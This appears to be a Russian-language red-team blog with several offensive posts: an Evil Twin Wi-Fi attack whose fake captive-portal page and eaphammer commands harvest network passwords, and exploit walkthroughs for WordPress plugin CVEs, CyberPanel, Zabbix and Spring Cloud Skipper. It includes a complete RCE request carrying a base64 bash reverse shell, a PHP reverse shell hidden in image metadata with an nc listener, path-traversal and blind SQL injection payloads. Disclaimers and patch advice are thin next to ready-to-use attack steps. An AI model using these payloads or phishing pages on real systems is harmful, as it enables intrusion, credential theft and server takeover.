GISCYBERTEAM

Похищение данных для подключения к Wi-Fi через Captive Portal

2025-01-22T09:22:38.279Z

Введение

Наверняка каждый, кто когда-либо подключался к публичной Wi-Fi сети, сталкивался с так называемым порталом авторизации, или captive portal.

Captive portal — это веб-интерфейс, который появляется при попытке доступа к интернету через публичную Wi-Fi сеть. Он требует от пользователя выполнения определенных действий, таких как ввод логина и пароля, согласие с условиями использования или просмотр рекламы, прежде чем предоставить доступ к интернету.

Пример того как может выглядеть Captive Portal:

В данной статье будет рассмотрен процесс создания фальшивой точки доступа (Evil Twin) с целью перехвата данных, которые жертва введет на портале авторизации нашей сети.

Evil Twin атака на Wi-Fi — это тип кибератаки, при которой злоумышленник создает поддельную точку доступа Wi-Fi, которая выглядит как легитимная. Пользователи, подключаясь к этой фальшивой сети, могут случайно раскрыть свои личные данные, такие как пароли и другую конфиденциальную информацию. Злоумышленник может перехватывать трафик и использовать его в своих целях.

Evil Twin с Captive Portal — это более сложная версия этой атаки, где злоумышленник использует поддельный Captive Portal (веб-страницу, на которую перенаправляются пользователи для аутентификации или согласия на использование сети). После подключения к поддельной сети пользователи видят страницу, которая может имитировать легитимный портал, например, страницу входа в Wi-Fi в кафе или отеле. На этой странице злоумышленник может запрашивать ввод учетных данных, что позволяет ему получить доступ к личной информации жертвы.

Более подробную информацию об атаках на Wi-Fi сети можно найти здесь и здесь.

Данная статья представлена исключительно в образовательных целях. Red Team сообщество "GISCYBERTEAM" не несёт ответственности за любые последствия ее использования третьими лицами.

Установка утилиты для атаки

Для реализации атаки будет использована утилита eaphammer. Если вы используете Kali Linux, установку eaphammer можно выполнить с помощью следующих команд:

sudo apt update
sudo apt upgrade
sudo apt install eaphammer

Если вы работаете с Parrot OS или другой операционной системой, установку утилиты можно осуществить следующим образом:

git clone <https://github.com/s0lst1c3/eaphammer.git>
./parrot-setup # либо kali-setup, либо ubuntu-unattended-setup, либо raspbian-setup

Более подробную информацию по установке можно найти здесь.

Создание страницы Captive Portal

Стандартная страница Captive Portal имеет исключительно иллюстративный характер, и собрать какие-либо реальные данные с её помощью вряд ли удастся, так как пользователи, скорее всего, не будут вводить свои данные на подобной странице:

Поэтому давайте перейдем к созданию собственного шаблона портала авторизации. Для начала разработаем простую HTML-страницу, которая будет вызывать меньше подозрений. В результате запросов двумя промптами могущественному ИИ была создана следующая привлекательная страница:

Код страницы:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Wi-Fi Access</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet">
    <style>
        body {
            background-color: #f8f9fa;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .card {
            width: 100%;
            max-width: 400px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            border: none;
        }
        .btn-primary {
            background-color: #007bff;
            border: none;
        }
        .btn-primary:hover {
            background-color: #0056b3;
        }
    </style>
</head>
<body>
    <div class="card p-4">
        <div class="text-center mb-4">
            <img src="static/giscyberteam.svg" alt="Logo" class="img-fluid mb-3" style="max-height: 200px;">
            <p class="text-muted">Вы были отключены от Wi-Fi сети <strong>GISCYBERTEAM</strong>. Пожалуйста, введит>
        </div>
        <form>
            <div class="mb-3">
                <label for="password" class="form-label">Пароль</label>
                <input type="password" name="password" class="form-control" id="password" placeholder="Введите пароль от сети" requ>
		            <input type="hidden" name="username" value="undefined">
            </div>
            <div class="d-grid">
                <button type="submit" class="btn btn-primary">Подключиться</button>
            </div>
        </form>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"></script>
</body>
</html>

К сожалению, eaphammer не поддерживает "сырые" HTML-страницы и принимает только шаблоны Jinja. Также следует учесть несколько важных моментов:

Все файлы, подключаемые через CDN (например Bootstrap), должны быть доступны локально, так как клиент в сети Evil Twin не будет иметь доступа к интернету и сможет получить их только с атакуемой машины.
Все подключаемые файлы (изображения, стили и т.д.) должны находиться в директории static, иначе веб-сервер eaphammer не сможет их обнаружить.
Файл index.html должен быть разделен на body.html и head.html, которые будут содержать соответствующие секции исходной страницы.
eaphammer не обрабатывает POST-параметры, кроме username и password. Более того, оба параметра должны присутствовать в запросе. Поэтому, даже если вам не требуется собирать, например, username, необходимо создать скрытый input с атрибутом name="username".

В соответствии с указанными требованиями, давайте создадим шаблон для captive portal. Мы разделим его на две части: head.html и body.html.

Код head.html:

{% block head %}
<meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Wi-Fi Access</title>
    <link href="{{ url_for('static', filename='bootstrap.min.css') }}" rel="stylesheet">
    <style>
        body {
            background-color: #f8f9fa;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .card {
            width: 100%;
            max-width: 400px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            border: none;
        }
        .btn-primary {
            background-color: #007bff;
            border: none;
        }
        .btn-primary:hover {
            background-color: #0056b3;
        }
    </style>
{% endblock %}

Код body.html:

{% block body %}
<div class="card p-4">
        <div class="text-center mb-4">
            <img src="{{ url_for('static', filename='giscyberteam.svg') }}" alt="Logo" class="img-fluid mb-3" style>
            <p class="text-muted">Вы были отключены от Wi-Fi сети <strong>GISCYBERTEAM</strong>. Пожалуйста, введит>
        </div>
        <form method="POST">
            <div class="mb-3">
                <label for="password" class="form-label">Пароль</label>
                <input type="password" class="form-control" name="password" id="password" placeholder="Введите паро>
                <input type="hidden" name="username" value="undefined">
</div>
            <div class="d-grid">
                <button type="submit" class="btn btn-primary">Подключиться</button>
            </div>
        </form>
    </div>

    <script src="{{ url_for('static', filename='bootstrap.bundle.min.js') }}"></script>
{% endblock %}

Всё содержимое шаблона необходимо поместить в директорию /usr/share/eaphammer/templates/<название шаблона>(в настоящем примере - /usr/share/eaphammer/templates/giscyberteam).

Запуск Evil Twin с Captive Portal

Для запуска Evil Twin с Captive Portal можно использовать следующую команду:

sudo eaphammer --essid GISCYBERTEAM --captive-portal --portal-template=giscyberteam --auth open --interface wlan0

Описание опций:

--essid - имя беспроводной сети

--captive-portal - указывает eaphammer, что после подключения к сети клиента необходимо направить на портал авторизации

--portal-template - указывает название шаблона captive portal. Фактически это название директории из /usr/share/eaphammer/templates

--auth - метод аутентификации (в настоящем примере open, что значит подключение осуществляется без пароля

--interface - название интерфейса Wi-Fi адаптера, на котором будет поднята точка доступа

Атака требует наличие адаптера Wi-Fi, способного поднимать собственную точку доступа (AP - Access Point).

После запуска утилиты можно будет подключиться к фальшивой точке доступа:

В случае ввода данных пользователем они появятся в выводе eaphammer’a:

Заключение

В заключение, в данной статье была рассмотрена атака Evil Twin, реализованная через Captive Portal с использованием кастомного шаблона веб-страницы для веб-сервера eaphammer.

Данная атака в значительной степени основывается на принципах социальной инженерии, что подчеркивает важность повышения осведомленности пользователей о потенциальных угрозах.

Для эффективной защиты от подобных атак настоятельно рекомендуется проводить регулярное обучение персонала основам информационной безопасности, что позволит снизить риски и повысить уровень защиты корпоративных сетей.

Remote Code Execution в Widget Options (WordPress Plugin) - CVE-2024-8672

2024-12-18T11:06:04.154Z

Введение

8 ноября 2024 года в плагине Widget Options для WordPress, который установлен более чем на 100,000 сайтах, была выявлена критическая уязвимость с оценкой 9.9 по CVSS.

Уязвимость позволяет выполнять удалённое исполнение вредоносного кода пользователю, имеющему права "Contributor" и выше. Уязвимости подвержены все версии плагина ниже 4.0.7 (включительно).

Данная статья представлена исключительно в образовательных целях. Red Team сообщество "GISCYBERTEAM" не несёт ответственности за любые последствия ее использования третьими лицами.

Подготовка стендового окружения

Для работы WordPress необходимо установить веб-сервер с поддержкой PHP, а также поднять MySQL. В качестве тестового окружения будет использоваться XAMPP.

Установка WordPress

Заходим на страницу загрузки WordPress и скачиваем последнюю версию:

Теперь нужно разархивировать WordPress и перенести его в корневой каталог веб-сервера (для XAMPP - /opt/lampp/htdocs):

cd ~/Downloads
unzip wordpress-6.6.2.zip
sudo mv wordpress /opt/lampp/htdocs/

Также нужно изменить владельца папки wordpress на пользователя веб-сервера (в случае с XAMPP - daemon):

sudo chown -R daemon:daemon /opt/lampp/htdocs

Дальнейшая установка происходит в GUI WordPress.

Чтобы перейти к нему в браузере заходим на http://127.0.0.1/wordpress:

Здесь необходимо будет указать данные для подключения к MySQL (для XAMPP - имя пользователя root и пустой пароль), а также создать админского пользователя:

WordPress установлен, перейдём к установке уязвимого плагина. Скачать его можно с официального магазина плагинов WordPress.

После скачивания архива необходимо добавить плагин в разделе Plugins -> Installed Plugins:

Для корректной работы плагина необходимо создать пользователя с правами Contributor или выше. Это можно сделать в разделе Users:

Эксплуатация уязвимости

Для эксплуатации уязвимости требуется предварительное получение токена X-WP-Nonce для доступа к API. Токен можно получить, например, в процессе редактирования поста. Для этого необходимо войти в аккаунт пользователя с правами Contributor или выше, перейти в раздел Pages и создать новую страницу:

После этого открывается редактор новой страницы, который обращается к API WordPress, передавая заголовок X-WP-Nonce, который нам и нужен:

Теперь, для удалённого исполнения кода достаточно отправить GET или POST запрос:

GET /wordpress/wp-json/wp/v2/block-renderer/core/latest-comments?context=edit&attributes[commentsToShow]=5&attributes[displayAvatar]=true&attributes[displayDate]=true&attributes[displayExcerpt]=true&attributes[extended_widget_opts][class][logic]=system('echo%20YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xNzIuMjAuMTAuNy85MDkwIDA%2bJjE%3d%20%7c%20base64%20-d%20%7c%20bash')%3b&post_id=0&_locale=site HTTP/1.1
Host: 172.20.10.4
X-WP-Nonce: 9e522759e7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Cookie: wordpress_1b6551980342ecf58eebf5856affe450=giscyber%7C1734595337%7CF8sUnAXgLkDM8n7uBpdWopkriSjO1WFUnF91dG5D8rT%7C8fa7c9c6dcc8623f61635c8ada3264d95e587a7707d0e7b3c400e74863995bbe; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_1b6551980342ecf58eebf5856affe450=giscyber%7C1734595337%7CF8sUnAXgLkDM8n7uBpdWopkriSjO1WFUnF91dG5D8rT%7C4588a3ce29d09a5b7e7ddf6db7e3abe10380154abd51cdd4db3e31b16a4e13c2; wp-settings-time-3=1734422641

Здесь параметр GET attributes[extended_widget_opts][class][logic] передается в функцию PHP eval, которая выполняет переданный ей аргумент как код PHP. При этом значение данного параметра содержит вызов функции system, что позволяет исполнять переданный аргумент как команду в терминале операционной системы сервера.

Таким образом, в терминал операционной системы сервера передается команда echo YmFzaCAtaSA JiAvZGV2L3RjcC8xNzIuMjAuMTAuNy85MDkwIDAJjE= | base64 -d | bash, которая представляет собой инструкцию для отправки обратного шелла (или reverse shell) на атакующую машину. Эта команда декодирует закодированную строку с помощью base64 и передает результат в интерпретатор bash, что позволяет получить удаленный доступ к системе и выполнять произвольные команды.

Reverse shell — это метод удаленного доступа, при котором целевая машина устанавливает соединение с атакующей машиной, позволяя выполнять команды на целевой системе. В отличие от обычного шелла, где атакующий инициирует соединение, в reverse shell инициатором является жертва, что помогает обойти некоторые меры безопасности, такие как брандмауэры.

Причины уязвимости

Причина уязвимости тривиальна: разработчики передают GET-параметр в функцию eval без каких-либо проверок или валидации. Ниже представлен код функции, в которую передается уязвимый GET-параметр до устранения данной уязвимости:

function widgetopts_safe_eval($expression)
{
    ob_start();
    try {
        $result = (bool) eval("return $expression;");
    } catch (Throwable $e) {
        return false;
    }
    ob_end_clean();

    return $result;
}

Как видно, к выражению не применяются никакие фильтры, и оно сразу передается в функцию eval. После исправления разработчик внедрил фильтрацию потенциально опасных функций PHP, в результате чего функция была модифицирована следующим образом:

function widgetopts_safe_eval($expression)
{
    // List of potentially harmful patterns
    $dangerous_patterns = [
        // Database-related keywords
        '/\binsert\b/i',
        '/\bupdate\b/i',
        '/\bdelete\b/i',
        '/\breplace\b/i',
        '/\bselect\b/i',
        '/\bdrop\b/i',
        '/\balter\b/i',

        // WordPress-specific database functions
        '/\bwp_insert_post\b/i',
        '/\bwp_update_post\b/i',
        '/\bwp_delete_post\b/i',
        '/\bwp_insert_user\b/i',
        '/\bwp_update_user\b/i',
        '/\bwp_delete_user\b/i',
        '/\badd_option\b/i',
        '/\bupdate_option\b/i',
        '/\bdelete_option\b/i',
        '/\bwpdb\b/i',

        // JavaScript, CSS, and HTML
        '/<script\b[^>]*>(.*?)<\/script>/i',
        '/<style\b[^>]*>(.*?)<\/style>/i',

        // PHP file manipulation functions
        '/\bfile_put_contents\b/i',
        '/\bfile_get_contents\b/i',
        '/\bfopen\b/i',
        '/\bfwrite\b/i',
        '/\bunlink\b/i',
        '/\brename\b/i',
        '/\bchmod\b/i',
        '/\bchown\b/i',
        '/\bcopy\b/i',
        '/\bscandir\b/i',

        // External connections
        '/\bwp_remote_get\b/i',
        '/\bwp_remote_post\b/i',
        '/\bcurl_init\b/i',
        '/\bstream_context_create\b/i',

        // Reflection and dynamic variable/function manipulation
        '/\bReflectionClass\b/i',
        '/\bReflectionMethod\b/i',
        '/\bReflectionProperty\b/i',
        '/\bcall_user_func\b/i',
        '/\bcall_user_func_array\b/i',
        '/\bextract\b/i',
        '/\bparse_str\b/i',

        // System commands
        '/\beval\b/i',
        '/\bsystem\b/i',
        '/\bshell_exec\b/i',
        '/\bexec\b/i',
        '/\bpassthru\b/i',
        '/\bpopen\b/i'
    ];

    $return = true;
    // Pattern matching
    foreach ($dangerous_patterns as $pattern) {
        if (preg_match($pattern, $expression)) {
            $return = false;
            break;
        }
    }

    if ($return === false) {
        return $return;
    }

    if (stristr($expression, "return") === false) {
        $expression = "return (" . $expression . ");";
    }

    ob_start();
    try {
        $result = (bool) (@eval($expression));
    } catch (\Exception $e) {
        $result = false;
    } catch (\Error $e) {
        $result = false;
    } catch (\ParseError $e) {
        $result = false;
    } catch (\Throwable $e) {
        $result = false;
    }
    ob_end_clean();

    return $result;
}

Стоит отметить, что примененный в решении разработчика подход "черного списка" является менее безопасным по сравнению с подходом "белого списка". Более надежным вариантом было бы составить список разрешенных функций, а не список запрещенных, что значительно снизило бы риск эксплуатации уязвимостей и повысило бы общую безопасность приложения.

Заключение

В заключение, уязвимость CVE-2024-8672, обладающая высоким уровнем критичности с оценкой CVSS 9.9, представляет серьезную угрозу для безопасности приложений, позволяя пользователям с правами Contributor и выше выполнять удаленное исполнение кода на сервере. Это может привести к компрометации данных и нарушению работы системы.

В связи с этим, настоятельно рекомендуется всем пользователям обновить плагин до последней версии (на момент написания статьи - 4.0.8), в которой данная уязвимость была устранена.

Сегодня мы рассмотрим критическую уязвимость в плагине WordPress, затрагивающую более 100,000 сайтов. Данная уязвимость имеет высокую оценку CVSS 9.9 и предоставляет пользователям с правами Contributor и выше возможность удаленного выполнения вредоносного кода на сервере приложения.

Критическая уязвимость в Wordpress-плагине WP Umbrella (CVE-2024-12209)

2024-12-17T15:16:38.840Z

Введение

В популярном плагине WordPress — WP Umbrella, установленном более чем на 30 000 сайтов, была обнаружена критическая уязвимость. Этот недостаток, получивший идентификатор CVE-2024-12209, может позволить неавторизованным злоумышленникам полностью захватить контроль над уязвимыми сайтами.

Уязвимость имеет оценку в 9.8 баллов по CVSS.

Данная статья представлена исключительно в образовательных целях. Red Team сообщество "GISCYBERTEAM" не несёт ответственности за любые последствия ее использования третьими лицами.

Для чего используется плагин WP Umbrella

WP Umbrella — это плагин для управления WordPress-сайтами, который облегчает мониторинг, управление и обслуживание множества сайтов с одной центральной панели. Этот инструмент особенно полезен для разработчиков, агентств и владельцев бизнеса, которые обслуживают несколько сайтов WordPress.

Подготовка стендового окружения

Установка WordPress

Заходим на страницу загрузки WordPress и скачиваем последнюю версию:

Теперь нужно разархивировать WordPress и перенести его в корневой каталог веб-сервера (для XAMPP - /opt/lampp/htdocs):

cd ~/Downloads
unzip wordpress-6.6.2.zip
sudo mv wordpress /opt/lampp/htdocs/

Также нужно изменить владельца папки wordpress на пользователя веб-сервера (в случае с XAMPP - daemon):

sudo chown -R daemon:daemon /opt/lampp/htdocs

Дальнейшая установка происходит в GUI WordPress. Чтобы перейти к нему в браузере заходим на http://127.0.0.1/wordpress

Разбор уязвимости

LFI (Local File Inclusion) — это уязвимость в веб-приложениях, которая позволяет злоумышленнику включать файлы с локального сервера в контексте работы приложения. Обычно она возникает из-за недостаточной обработки входных данных в функциях, которые динамически подключают файлы, например, в PHP через include, require, include_once или require_once.

LFI в WP Umbrella доступна через параметр filename в функции umbrella-restore.

В статье будет рассмотрено два вектора эксплуатации уязвимости:

Для пользователя с ролью “Участник”, которому не доступна загрузка медиафайлов.
Для пользователя с ролью “Автор”, которому доступна загрузка медиафайлов.

Первый вектор

Для эксплуатации используем уже существующий PoC.

https://wp-dev.ddev.site/?umbrella-restore=1&filename=../../../../../../etc/passwd

Второй вектор

Подготовим jpg файл, который нужно будет загрузить на сервер. При помощи ExifTool добавим в комментарий Reverse Shell:

exiftool -Comment="<?php system('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash')?>" name.jpg

Чтобы загрузить файл, необходимо перейти во вкладку “Медиафайлы” и нажать “Добавить новый медиафайл”.

Когда файл загружен необходимо узнать по какому пути он находится, для этого можно скопировать URL:

От лица атакующего необходимо запустить слушателя:

nc -lvnp 4444

Теперь при помощи LFI можно открыть этот файл:

http://localhost/?umbrella-restore=1&filename=wp-content/uploads/2024/12/maxresdefault.jpg

Получаем connect:

Прочитаем флаг:

Заключение

CVE-2024-12209 демонстрирует критическую важность регулярного мониторинга и обновления используемых плагинов для WordPress.

Уязвимость в WP Umbrella, связанная с локальным включением файлов, позволяет атакующим осуществлять удалённое выполнение кода, что приводит к серьёзным последствиям, включая утечку данных и полный контроль над сервером.

CyberPanel Command Injection Vulnerability (CVE-2024-51378)

2024-12-16T07:24:00.842Z

Введение

В программном обеспечении CyberPanel обнаружена уязвимость, связанная с обходом аутентификации и выполнением произвольных команд через эндпоинты /dns/getresetstatus и /ftp/getresetstatus. Уязвимость присутствует в файлах dns/views.py и ftp/views.py версий до 2.3.7 включительно.

Данная статья представлена исключительно в образовательных целях. Red Team сообщество "GISCYBERTEAM" не несёт ответственности за любые последствия ее использования третьими лицами.

Что такое CyberPanel

CyberPanel — это популярная бесплатная (с премиум-версией) панель управления сервером с открытым исходным кодом, разработанная для управления веб-хостингом и серверными ресурсами.

Она позволяет администраторам удобно управлять сайтами, доменами, базами данных, почтовыми сервисами и другими функциями через графический веб-интерфейс.

CyberPanel особенно востребована среди небольших хостинговых компаний, разработчиков и владельцев сайтов, благодаря своей простоте использования и поддержке современных технологий.

Подготовка стендового окружения

Для эксплуатирования уязвимости будет использоваться VPS, на которой используется CyberPanel уязвимой версии.

Для установки необходимо выполнить следующие команды:

Обновить кэш пакетного менеджера:

apt-get update

Установить утилиту wget и скачать установочный скрипт:

apt install wget
cd /opt
wget -O installer.sh <https://cyberpanel.net/install.sh>

Запустить скрипт:

chmod +x installer.sh
sh installer.sh

Далее идет конфигурирование панели перед установкой.

По окончании процедуры установки будет такой вывод:

Когда операционная система сервера загрузится, откройте в браузере вебстраницу https://<IP_вашего_сервера>:8090.

Разбор уязвимости

RCE (Remote Code Execution) — это тип уязвимости в программном обеспечении, позволяющий злоумышленнику удалённо выполнять произвольный код на сервере или устройстве, уязвимом к данной атаке. RCE считается одной из наиболее опасных уязвимостей, так как она предоставляет атакующему практически полный контроль над целевой системой.

Для демонстрации эксплуатации воспользуемся публичным эксплойтом:

git clone https://github.com/refr4g/CVE-2024-51378.git

Запустим скрипт:

cd CVE-2024-51378
python3 CVE-2024-51378.py http://target.com:8090 /ftp/getresetstatus

Получаем root-флаг:

Заключение

Для предотвращения атак настоятельно рекомендуется срочно установить патч, ограничить доступ к панели управления и провести аудит системы на предмет возможного компрометации. Эта уязвимость подчеркивает важность регулярного обновления ПО и применения средств мониторинга.

Remote Code Execution через SQL инъекцию в Zabbix (CVE-2024-42327)

2024-12-11T11:23:10.576Z

Введение

Zabbix — это система мониторинга, предназначенная для отслеживания состояния ИТ-инфраструктуры, серверов, сетевых устройств, приложений и сервисов в реальном времени.

Для чего нужен:

Мониторинг ресурсов: CPU, память, диски, сетевые интерфейсы.
Слежение за доступностью: Проверка работы сайтов, приложений, баз данных.
Уведомления: Настройка алертов (e-mail, Telegram, SMS) при сбоях или достижении критических значений.
Сбор метрик: Анализ производительности и прогнозирование проблем.
Автоматизация задач: Выполнение удалённых команд на серверах.

Zabbix полезен для обеспечения стабильной работы инфраструктуры и быстрого реагирования на проблемы.

Данная статья представлена исключительно в образовательных целях. Red Team сообщество "GISCYBERTEAM" не несёт ответственности за любые последствия ее использования третьими лицами.

Об уязвимости

7 ноября 2024 года была выявлена критическая уязвимость в Zabbix с CVSS-оценкой 9.9, представляющая собой SQL-инъекцию в одном из эндпоинтов API Zabbix. Уязвимость позволяет атакующему, имеющему доступ к API, выполнить произвольные SQL-запросы. При определённых настройках Zabbix, которые разрешают удалённое выполнение команд через агентов, эта уязвимость может быть использована для полной компрометации инфраструктуры, находящейся под мониторингом Zabbix.

Уязвимости подвержены следующие версии Zabbix Frontend:

6.0.0 - 6.0.31 / 6.0.32rc1
6.4.0 - 6.4.16 / 6.4.17rc1
7.0.0 / 7.0.1rc1

SQL-инъекция — это тип уязвимости в приложениях, при которой злоумышленник может вставить вредоносные SQL-запросы в строку запроса к базе данных. Это может позволить ему получить несанкционированный доступ к данным, изменить их, удалить или выполнить другие вредоносные операции, такие как обход аутентификации или управление системой. SQL-инъекции часто возникают из-за недостаточной валидации входных данных.

Подготовка тестового окружения

Для развертывания стенда будет использована виртуальная машина с операционной системой Debian, на которой Zabbix версии 6.0.30 будет развернут в Docker контейнере. Установка будет производиться с использованием следующих команд:

sudo apt install docker.io docker-compose # установка Docker и docker-compose
nano docker-compose.yaml

После выполнения этих команд откроется текстовый редактор с файлом docker-compose.yaml, в который необходимо внести следующее содержимое:

version: '3.5'

services:
  zabbix-db:
    image: mysql:8.0-oracle
    container_name: zabbix-db
    environment:
      MYSQL_DATABASE: zabbix
      MYSQL_USER: zabbix
      MYSQL_PASSWORD: zabbix_password
      MYSQL_ROOT_PASSWORD: root_password
    volumes:
      - zabbix-db-data:/var/lib/mysql
    restart: unless-stopped

  zabbix-server:
    image: zabbix/zabbix-server-mysql:ubuntu-6.0.30
    container_name: zabbix-server
    environment:
      DB_SERVER_HOST: zabbix-db
      MYSQL_DATABASE: zabbix
      MYSQL_USER: zabbix
      MYSQL_PASSWORD: zabbix_password
    depends_on:
      - zabbix-db
    ports:
      - "10051:10051"
    restart: unless-stopped

  zabbix-web:
    image: zabbix/zabbix-web-nginx-mysql:ubuntu-6.0.30
    container_name: zabbix-web
    environment:
      DB_SERVER_HOST: zabbix-db
      MYSQL_DATABASE: zabbix
      MYSQL_USER: zabbix
      MYSQL_PASSWORD: zabbix_password
      PHP_TZ: Europe/Moscow
    depends_on:
      - zabbix-server
    ports:
      - "8080:8080"
    restart: unless-stopped

  zabbix-agent:
    image: zabbix/zabbix-agent:ubuntu-6.0.30
    container_name: zabbix-agent
    environment:
      ZBX_SERVER_HOST: zabbix-server
    depends_on:
      - zabbix-server
    restart: unless-stopped

volumes:
  zabbix-db-data:

Теперь для запуска Zabbix достаточно выполнить команду из каталога, содержащего файл docker-compose.yaml:

sudo docker-compose up -d

Веб-интерфейс Zabbix стал доступен по адресу: http://127.0.0.1:8080:

Также обратите внимание, что Zabbix можно установить с помощью официальных Docker контейнеров. Они доступны для скачивания на GitHub.

Подготовка условий для эксплуатации уязвимости

Для эксплуатации уязвимости необходим пользовательский аккаунт с доступом к API. Для демонстрации создадим аккаунт с минимальными правами, но доступом к API. Создать пользователя можно в разделе Administration -> Users:

Стандартные админские учётные данные Zabbix:Логин: AdminПароль: zabbix

Создадим учетную запись giscyber и назначим специальную роль для этой учетной записи в разделе Administration -> User roles. Роль будет настроена с минимальными привилегиями и доступом к API:

Для получения токена сессии отправьте POST запрос с логином и паролем пользователя к API Zabbix:

Получив сессионный ключ, можно приступить к эксплуатации уязвимости.

Эксплуатация уявзимости

Эндпоинт users.get, доступный любому пользователю Zabbix с доступом к API, уязвим к Time-based Blind SQL injection. Для проверки уязвимости можно отправить следующий запрос на /api_jsonrpc.php:

{
  "jsonrpc": "2.0",
  "method": "user.get",
  "params": {
    "selectRole": [
      "roleid",
      "name",
      "type",
      "readonly AND (SELECT(SLEEP(5)))"
    ],
    "userids": [
      "1",
      "2"
    ]
  },
  "id": 1,
  "auth": "**ЗДЕСЬ ИСПОЛЬЗУЕТСЯ ПОЛУЧЕННЫЙ РАНЕЕ СЕССИОННЫЙ КЛЮЧ**"
}

SQL инъекция — это атака, при которой злоумышленник вводит вредоносный SQL код в приложение для доступа или изменения данных в базе данных.

Time-based SQL инъекция — это тип атаки, при котором злоумышленник использует функцию паузы в SQL запросе, чтобы проверить наличие определенных условий путем измерения времени ответа сервера.

Как видно, в данном запросе используется встроенная в MySQL функция SLEEP(), которая вызывает паузу на заданное внутри скобок количество секунд. Отправив запрос, можно убедиться, что ответ сервера занимает ровно 5 секунд, что подтверждает уязвимость к Time-based blind SQL injection:

Для демонстрации возможной пользы уязвимости воспользуемся следующей нагрузкой, чтобы извлечь название базы данных, с которой работает Zabbix.

AND (SELECT SLEEP(5) FROM DUAL WHERE DATABASE() LIKE '_')

Для начала необходимо выяснить сколько символов в названии базы данных, для этого добавляем символ _ в нагрузку пока приложение не ответит с задержкой >= 5 секундам. Для тестовой конфигурации нагрузка отработала при 6 символах _, значит имя базы данных содержит ровно 6 символов:

Выделим 1 символ _ и отправим его в Intruder Burp Suite, затем выберем режим Brute forcerдля перебора первого символа имени базы данных:

Сортируем по времени ответы сервера и узнаём, что первая буква в имени базы данных - z:

Проделав такие манипуляции для всех символов, выясняем что имя БД - "zabbix":

Вывод

С помощью Time-based SQL-инъекции злоумышленник может получить доступ к более привилегированным учетным записям Zabbix, что создает угрозу компрометации всей инфраструктуры, находящейся под наблюдением агентов Zabbix.

Это делает уязвимость особенно серьезной, что подтверждается высоким рейтингом CVSS.

В связи с этим крайне рекомендуется устанавливать самые последние версии программного обеспечения, в которых выпущены соответствующие патчи для устранения данной уязвимости.

CVE-2024-37084: удаленное выполнение кода в Spring Cloud

2024-12-09T13:23:15.846Z

Введение

Spring Cloud Skipper — это инструмент, который позволяет находить приложения Spring Boot и управлять их жизненным циклом на нескольких облачных платформах.

Вы можете использовать Skipper отдельно или интегрировать его с конвейерами непрерывной интеграции для обеспечения непрерывного развёртывания приложений.

Skipper возник из-за необходимости выполнять «потоковые изменения» в Spring Cloud Data Flow. Позже было признано, что для обеспечения этой функции следует создать проект более общего назначения Skipper, чтобы он также мог быть полезным набором инструментов вне контекста Spring Cloud Data Flow.

Данная статья представлена исключительно в образовательных целях. Red Team сообщество "GISCYBERTEAM" не несёт ответственности за любые последствия ее использования третьими лицами.

Описание уязвимости

CVE-2024-37084 — это уязвимость в Spring Cloud Skipper, которая позволяет получить доступ к исходным данным YAML.

Чтобы преобразовать объект в формат Yaml (стандартный Yaml-конструктор), выполните обратную последовательность (десериализацию) для этого объекта.

Десериализация (deserialization) - это процесс создания структуры данных из битовой последовательности путем перевода этой последовательности в объекты и их упорядочивания (структуризации).

RCE (Remote Code Execution) - это тип уязвимости в веб-приложениях, позволяющий злоумышленникам выполнять произвольный код на удаленном сервере. Это одна из самых опасных уязвимостей, так как она дает полный контроль над системой.

Подготовка стенда

Скачиваем версию 2.11.0 Spring Cloud Data Flow.

https://github.com/spring-cloud/spring-cloud-dataflow/releases

В spring-cloud-dataflow-2.11.0/src/docker-compose/docker-compose.yml

Добавляем следующие строчки для отладки:

В раздел environment:

JAVA_TOOL_OPTIONS=agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address =*:5005

в раздел ports:

- "5005:5005"

Собираем докер:

sudo docker compose up --build

После установки можно просмотреть панель управления и API Skipper Server:

Разбор уязвимости

Анализ исходного кода

Находим функцию загрузки по пути:

spring-cloud-dataflow-2.11.0/spring-cloud-skipper/spring-cloud-skipper-server-core/src/main/java/org/springframework/cloud/skipper/server/service/PackageService.java

Функция:

Описание функции upload():

Подвердить запрос на загрузку

Repository localRepositoryToUpload = getRepositoryToUpload(uploadRequest.getRepoName());

Эта функция проверяет данные запроса на загрузку, чтобы убедиться, что они действительны, прежде чем продолжить.

Получение репозитория для загрузки

Repository localRepositoryToUpload = getRepositoryToUpload(uploadRequest.getRepoName());

Указание репозитория, в который будет загружен пакет, на основе имени репозитория, указанного в запросе.

Создание временного каталога и создание файла пакета

packageDirPath = TempFileUtils.createTempDirectory("skipperUpload");
File packageDir = new File(packageDirPath + File.separator + uploadRequest.getName());
packageDir.mkdir();
Path packageFile = Paths.get(packageDir.getPath() + File.separator + uploadRequest.getName() + "-" + uploadRequest.getVersion() + "." + uploadRequest.getExtension());
Files.write(packageFile, uploadRequest.getPackageFileAsBytes());

Создание временной директории в системе для размещения загружаемого пакета. Затем из данных пакета создаются временные файлы и сохраняются в этой директории.

Распаковка файла для загрузки

ZipUtil.unpack(packageFile.toFile(), packageDir);

После загрузки файл будет распакован, чтобы иметь возможность считывать и обрабатывать содержащиеся в нем данные.

Проверка, что пакет был распакован

String unzippedPath = packageDir.getAbsolutePath() + File.separator + uploadRequest.getName() + "-" + uploadRequest.getVersion();
File unpackagedFile = new File(unzippedPath);
Assert.isTrue(unpackagedFile.exists(), "Package is expected to be unpacked, but it doesn't exist");

